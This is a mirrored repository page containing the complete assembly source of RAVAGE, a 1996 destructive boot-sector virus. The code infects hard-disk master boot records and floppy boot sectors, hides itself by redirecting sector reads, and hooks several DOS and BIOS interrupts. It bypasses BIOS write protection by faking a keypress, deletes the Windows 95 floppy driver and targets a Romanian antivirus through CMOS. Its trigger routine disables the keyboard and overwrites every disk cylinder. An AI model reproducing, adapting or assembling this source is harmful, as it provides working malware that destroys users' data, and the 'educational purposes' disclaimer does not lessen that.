mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-18 16:25:28 +00:00
573 lines
10 KiB
NASM
573 lines
10 KiB
NASM
; RAVAGE BSV Written by RP & muRPhy October 1996
|
|
; version 9.0 [ New Generation ] -- WIN95 compatible :-)
|
|
;
|
|
;Replicator module (c) 1994-96 RP, Bucharest
|
|
;Tips & tricks (c) 1995-96 muRPhy, Bucharest
|
|
;Final version full options Warning!!! Distructive sequence included!
|
|
|
|
;This source code is for educational purposes only. The author is not
|
|
;responsible for any problems caused due to the assembly of this file"
|
|
|
|
|
|
.286
|
|
code segment
|
|
assume cs:code
|
|
org 100h
|
|
start:
|
|
q db 7b00h dup(90h)
|
|
timer equ 08h
|
|
|
|
jmp begin
|
|
bootrecord db 32 dup(0) ;min=32
|
|
|
|
|
|
;............. Entry point ..............................
|
|
begin:
|
|
push cs
|
|
|
|
mov di,414h; steal 1k of RAM
|
|
pop ds
|
|
mov byte ptr ds:[04a1h],0eah ;pun cod de jmp xxxx:xxxx pt INT 40H
|
|
dec di ;added code for jmp xxxx:xxxx for INT 40H
|
|
dec ds:word ptr[di]
|
|
mov ax,ds:word ptr[di]
|
|
shl ax,6 ;only >80186
|
|
sub ax,07c0h
|
|
push ax
|
|
push ax
|
|
;.......................................................
|
|
mov ax,0201h; read the other sector of the virus
|
|
push cs
|
|
pop es
|
|
mov bx,7e00h
|
|
mov cx,000fh
|
|
cxpar equ this word
|
|
mov dx,0080h
|
|
dxpar equ this word
|
|
int 13h
|
|
|
|
mov word ptr ds:[offset temp-2],609Ch ;refac cod de pushf pusha
|
|
;restoring code for pushf pusha
|
|
; mov bx,0100h ;get original INT 40H
|
|
mov bh,01 ;bl already 00 from bx=7e00
|
|
les ax,[bx]
|
|
mov ds:[int40seg],es ;store original INT 40H
|
|
mov ds:[int40ofs],ax
|
|
|
|
;.......................................................
|
|
pop ax
|
|
mov bx,04a2h ;prepare code at 0:4a1h for jmp xxxx:xxxx
|
|
mov [bx],offset int40
|
|
mov word ptr [bx+02],ax
|
|
|
|
mov bx,004ch; get & corrupt int 13h
|
|
xchg ds:[bx+2],ax
|
|
mov ds:[int13seg],ax
|
|
mov ax,offset int13
|
|
xchg ds:[bx],ax
|
|
mov ds:[int13ofs],ax
|
|
;.......................................................
|
|
pop es
|
|
mov si,7c00h; transfer virus code
|
|
mov di,si
|
|
cld
|
|
xor cx,cx
|
|
mov ch,02 ;anti TBAV flag O
|
|
rep movsw
|
|
|
|
cli
|
|
mov ax,es ;get & corrupt INT 08H
|
|
; mov bx,timer*4
|
|
mov bl,timer*4 ;bh already 00 from bx=004ch
|
|
xchg ds:[bx+2],ax
|
|
mov es:[int08seg],ax
|
|
mov ax,offset int08
|
|
xchg ds:[bx],ax
|
|
mov es:[int08ofs],ax
|
|
|
|
mov ax,0201h ; fast boot infector sequence
|
|
mov dx,0080h
|
|
inc cx
|
|
int 13h
|
|
|
|
call testziuaz ; is it trash day ?
|
|
cmp dx,0303h
|
|
ziuaz equ this word
|
|
jnz boot
|
|
|
|
jmp entry
|
|
boot:
|
|
int 19h
|
|
;------------------- int 40h
|
|
|
|
jmpint40:
|
|
db 0eah
|
|
int40ofs dw 0
|
|
int40seg dw 0
|
|
|
|
;----------------- Corrupted entry in INT 40H
|
|
int40:
|
|
cmp ah,02h
|
|
jnz jmpint40
|
|
cmp cx,0001
|
|
jnz jmpint40
|
|
or dh,dh
|
|
jnz jmpint40
|
|
call disketa
|
|
jmp short verificare
|
|
|
|
|
|
;................. jmp int 13 ............................
|
|
jmpint13:
|
|
db 0eah; jmp xxxx:xxxx
|
|
int13ofs dw 0
|
|
int13seg dw 0
|
|
;...........................................................
|
|
cmp03:
|
|
cmp ah,03
|
|
jne jmpint13
|
|
cmp dl,80h
|
|
jb jmpint13
|
|
jmp short contcmp
|
|
|
|
|
|
;...........................................................
|
|
|
|
int13: ; FAR PROCEDURE FOR HANDLING INTERRUPT 13H
|
|
cmp ah,02h
|
|
jnz cmp03
|
|
;---
|
|
cmp dl,80h ;pe HDD
|
|
jb contcmp
|
|
or dh,dh ;head 0?
|
|
jnz contcmp
|
|
cmp cx,000eh ;se redirecteaza 14 si 15 pe 13 presupus cu zerouri
|
|
jz fak ;sau cu orice altceva
|
|
cmp cx,000fh ;show instead of sectors 14 and 15 , sector 13
|
|
jnz contcmp ;sector 13 supposed zeroed or whatever
|
|
;not quite good implemented but works anyway
|
|
fak:
|
|
mov cl,0dh
|
|
jmp jmpint13
|
|
;---
|
|
contcmp:
|
|
cmp cx,0001
|
|
jnz jmpint13
|
|
or dh,dh; <=> cmp dh,00
|
|
jnz jmpint13
|
|
|
|
cmp dl,80h
|
|
jae hard
|
|
call disketa
|
|
jmp short verificare
|
|
hard:
|
|
call callint13; it was requested a read action for the boot
|
|
verificare:
|
|
jc giveup
|
|
cmp es:word ptr[bx+1bch],0202h; is it infected?
|
|
jz showboot
|
|
call compute
|
|
mov ax,0301h; write real boot on computed sector
|
|
call callint13
|
|
jnc continue
|
|
clearerr:
|
|
clc
|
|
giveup:
|
|
retf 0002
|
|
showboot:
|
|
call compute
|
|
mov ax,0201h
|
|
call callint13
|
|
jmp short giveup
|
|
;-------------------------
|
|
continue:
|
|
push es
|
|
push bx
|
|
push cs
|
|
pop es
|
|
mov ax,0301h; write the other sector of the virus
|
|
inc cx
|
|
mov cs:[offset cxpar-2],cx
|
|
mov cs:[offset dxpar-2],dx
|
|
mov bx,7e00h
|
|
call callint13
|
|
pop bx
|
|
pop es
|
|
jc clearerr
|
|
|
|
push es
|
|
push bx
|
|
push ds
|
|
push si
|
|
push di
|
|
|
|
push es
|
|
pop ds
|
|
push cs
|
|
pop es
|
|
|
|
mov si,bx
|
|
add si,1beh; copy the partition into the virus code
|
|
mov di,7dbeh
|
|
mov cl,21h
|
|
cld
|
|
rep movsw
|
|
mov si,bx; copy the boot record into the virus code
|
|
add si,3
|
|
mov di,7c03h
|
|
mov cl,16
|
|
rep movsw
|
|
|
|
|
|
cmp dl,80h
|
|
jb normal
|
|
|
|
;-----
|
|
pusha
|
|
|
|
mov ah,05; bypass BIOS protection;place Y into keyboard buffer.
|
|
mov cl,59h
|
|
int 16h
|
|
call resetcmosflag
|
|
inc cs:word ptr [counter]
|
|
call testziuaz
|
|
mov al,dh
|
|
cmp al,09h
|
|
ja maimare ;"maimare " means "greater than"
|
|
add al,12h ;in Romanian language, of course...
|
|
daa
|
|
maimare:
|
|
sub al,09h
|
|
das
|
|
mov dh,al
|
|
mov cs:word ptr [offset ziuaz-2],dx
|
|
|
|
popa
|
|
;-----
|
|
|
|
normal:
|
|
inc cx ;salvez cx=0000 cu pusha dupa rep movsw =>cx=0001
|
|
;cx=0000 saved by pusha after rep movsw =>cx=0001
|
|
iar:
|
|
mov ax,0301h; write the virus onto the disk
|
|
mov bx,7c00h
|
|
xor dh,dh
|
|
call callint13
|
|
jc iar
|
|
call resetkeyboard
|
|
afar:
|
|
pop di
|
|
pop si
|
|
pop ds
|
|
pop bx
|
|
pop es
|
|
jmp giveup
|
|
|
|
disketa:
|
|
pushf
|
|
call cs:dword ptr [int40ofs]
|
|
ret
|
|
|
|
|
|
|
|
counter dw 0
|
|
virsign dw 0202h
|
|
partition1 db 80h,01h,01,00,06,0eh,201,231,11h,0,0,0,07,228,03,00
|
|
;take care (this is my partition)
|
|
;you'll have to change this with yours
|
|
db 30h dup (0)
|
|
db 55h,0aah
|
|
|
|
;............ Second sector ..............................
|
|
|
|
int2f: ;FAR PROCEDURE FOR HANDLING INTERRUPT 2FH
|
|
pushf
|
|
pusha
|
|
push ds
|
|
push es
|
|
|
|
xor bx,bx
|
|
mov ds,bx
|
|
mov bx,07b4h
|
|
cmp ax,1605h ;is it Init Windows ?
|
|
jne cont2f
|
|
mov ax,cs:[int13ofs] ;restore original handler of INT 13H
|
|
mov ds:[bx],ax
|
|
mov ds:[bx+0806h-07b4h],ax
|
|
mov ax,cs:[int13seg]
|
|
mov ds:[bx+2],ax
|
|
mov ds:[bx+2+0806h-07b4h],ax
|
|
|
|
mov ah,62h ;Get Active PSP segment
|
|
int 21h
|
|
mov ds,bx
|
|
mov ax,ds:[002ch] ;Get environment segment
|
|
mov es,ax
|
|
xor di,di
|
|
cld
|
|
mov cx,0050h
|
|
mov al,'o'
|
|
repnz scasb
|
|
cmp es:[di],'to' ; winbootdir?
|
|
jnz jmpint2f
|
|
|
|
add di,+06
|
|
push es
|
|
pop ds
|
|
mov dl,ds:[di]
|
|
sub dl,'C'-2
|
|
mov ah,0eh
|
|
int 21h
|
|
|
|
push di
|
|
pop dx
|
|
mov ah,3bh ;Change Directory to folder of WIN95
|
|
int 21h ;
|
|
; apelul windows de genul:
|
|
; win setup.exe nu se va realiza cum trebuie
|
|
;
|
|
;I guess if someone'll run something like
|
|
;win setup.exe worse things'll happen
|
|
;doesn't matter anyway (few of them will
|
|
;run win in this way)
|
|
push cs
|
|
pop ds
|
|
mov ah,41h ; Unlink ds:dx
|
|
mov dx,offset floppydriver
|
|
int 21h ;ideal ar fi sa nu dea eroare AX=1606h
|
|
;here I suppose AX will differ from 1606h
|
|
;more than that...I'm sure AX <> 1606h
|
|
cont2f:
|
|
cmp ax,1606h ;is it Exit Windows?
|
|
jne jmpint2f
|
|
mov ax,offset int13 ;corrupt again handler of INT 13H
|
|
mov ds:[bx],ax
|
|
mov ds:[bx+0806h-07b4h],ax
|
|
mov ds:[bx+2],cs
|
|
mov ds:[bx+2+0806h-07b4h],cs
|
|
|
|
cmp byte ptr ds:[04a6h],0DAH ;is flag set ?
|
|
jz entry
|
|
|
|
jmpint2f:
|
|
pop es
|
|
pop ds
|
|
popa
|
|
popf
|
|
db 0eah; jmp xxxx:xxxx
|
|
int2fofs dw 0
|
|
int2fseg dw 0
|
|
;----------------------------------
|
|
entry:
|
|
push cs
|
|
pop ds
|
|
mov si,offset txt-1
|
|
video:
|
|
mov ax,0010h
|
|
int 10h
|
|
mov ah,0eh
|
|
mov bl,0ah
|
|
repeta:
|
|
std
|
|
lodsb
|
|
cmp al,'$'
|
|
jz distroi
|
|
int 10h
|
|
jmp short repeta
|
|
distroi:
|
|
mov cx,0001h
|
|
destroyagain:
|
|
mov ax,030eh
|
|
mov dx,0180h
|
|
call callint13
|
|
call resetcmosflag
|
|
in al,21h ;disable keyboard
|
|
or al,02
|
|
out 21h,al
|
|
|
|
inc ch
|
|
jnz destroyagain ;
|
|
add cl,40h ;for all existing cylinders > 256
|
|
jmp short destroyagain
|
|
|
|
|
|
;..........................INT 21H
|
|
int21:
|
|
pushf
|
|
pusha
|
|
push ds
|
|
push es
|
|
mov di,dx
|
|
xor ah,4bh
|
|
jnz oldint21
|
|
push ds
|
|
pop es
|
|
xor al,al
|
|
cld
|
|
mov cl,0ffh
|
|
repnz scasb
|
|
std
|
|
mov al,'\'
|
|
repnz scasb
|
|
mov ax,ds:[di+02]
|
|
and ax,0dfdfh
|
|
cmp ax,'AR'
|
|
jnz oldint21
|
|
mov ah,ds:[di+04]
|
|
and ah,0dfh
|
|
cmp ah,'V'
|
|
jnz oldint21
|
|
mov al,01
|
|
out 70h,al
|
|
in al,71h
|
|
cmp al,126 ;max value for counter
|
|
jne ravnormal
|
|
|
|
mov ax,1600h ;checking Win active
|
|
int 2fh
|
|
or al,al
|
|
jz entry ;al=0 means Win not active
|
|
xor ax,ax
|
|
mov ds,ax
|
|
mov byte ptr ds:[04a6h],0DAh ;set flag on low memory
|
|
jmp short oldint21
|
|
|
|
|
|
|
|
;------------------------
|
|
ravnormal:
|
|
inc ax
|
|
push ax
|
|
mov al,01
|
|
out 70h,al
|
|
pop ax
|
|
out 71h,al
|
|
oldint21:
|
|
pop es
|
|
pop ds
|
|
popa
|
|
popf
|
|
db 0eah; JMP xxxx:xxxx
|
|
int21ofs dw 0
|
|
int21seg dw 0
|
|
;............... INT 08H .......................................
|
|
int08:
|
|
pushf
|
|
pusha
|
|
temp equ this word
|
|
push es
|
|
push ds
|
|
xor di,di ;DI=0000h
|
|
mov ds,di ;DS=0000h
|
|
mov ax,0b8ah
|
|
mov es,ax
|
|
cld
|
|
mov ax,'EP'
|
|
mov cx,0ffffh ;"cautare" means "searching"
|
|
;for those of you who don't speak
|
|
; Romanian language ;-)
|
|
cautare:
|
|
repnz scasw
|
|
or cx,cx
|
|
jz notyet
|
|
cmp es:[di],'=C'
|
|
jnz cautare
|
|
|
|
push cs
|
|
pop ax ; ax =residseg
|
|
mov di,02fh*4 ;Save segment INT 2Fh
|
|
xchg [di+02],ax ;Corrupt segment 2FH
|
|
mov cs:[int2fseg],ax
|
|
|
|
mov ax,offset int2f ;Save & corrupt offset INT 2FH
|
|
xchg [di],ax
|
|
mov cs:[int2fofs],ax
|
|
|
|
push cs
|
|
pop ax
|
|
mov di,021h*4 ;Save segment INT 21h
|
|
xchg [di+02],ax ;Corrupt segment 21H
|
|
mov cs:[int21seg],ax
|
|
|
|
mov ax,offset int21 ;Save & corrupt offset INT 21H
|
|
xchg [di],ax
|
|
mov cs:[int21ofs],ax
|
|
|
|
|
|
;Command.com alocat
|
|
inc word ptr ds:[0413h] ;refac la 0:413h
|
|
;restoring 0:413h
|
|
mov bx,0100h
|
|
mov word ptr ds:[bx],04a1h ;corrupt INT 40 to point 0:04a1h
|
|
mov word ptr ds:[bx+02],0 ;to a jmp far code
|
|
|
|
|
|
|
|
mov word ptr cs:[offset temp-2],[(offset peste)-(offset temp)] shl 8+ 0ebh
|
|
; dezactiveaza rutina de pe system timer (INT 08H)
|
|
; disabling (handler) routine for INT 08H
|
|
notyet:
|
|
pop ds
|
|
pop es
|
|
popa
|
|
popf
|
|
peste equ this word
|
|
db 0eah
|
|
int08ofs dw 0
|
|
int08seg dw 0
|
|
|
|
|
|
floppydriver db 'system\iosubsys\hsflop.pdr',0
|
|
|
|
testziuaz:
|
|
mov ah,04
|
|
int 1ah
|
|
cmp dl,28h
|
|
jbe nochange
|
|
mov dl,28h
|
|
nochange:
|
|
ret
|
|
|
|
|
|
|
|
callint13:
|
|
pushf
|
|
call cs:dword ptr[int13ofs]
|
|
ret
|
|
|
|
resetcmosflag:
|
|
mov al,01
|
|
out 70h,al
|
|
mov al,100 ;set counter in CMOS for RAV
|
|
out 71h,al ; RAV stands for Romanian AntiVirus
|
|
ret ;an AV prog from ROMANIA
|
|
|
|
|
|
compute:
|
|
mov cl,14
|
|
cmp dl,80h
|
|
jae back
|
|
mov dh,1
|
|
mov al,es:byte ptr[bx+15h]
|
|
cmp al,240; f0h 1.44 disk
|
|
je back
|
|
mov cl,3
|
|
back:
|
|
ret
|
|
resetkeyboard:
|
|
cmp dl,80h
|
|
jb nu
|
|
xor bx,bx
|
|
mov ds,bx
|
|
mov bl,1eh
|
|
mov ds:[041ah],bx
|
|
mov ds:[041ch],bx
|
|
nu:
|
|
ret
|
|
; '$RAVage is wiping data! RP&muRPhy '
|
|
text db '$yhPRum&PR !atad gnipiw si egaVAR'
|
|
txt equ this word
|
|
code ends
|
|
end start
|
|
muRPhy (c)96
|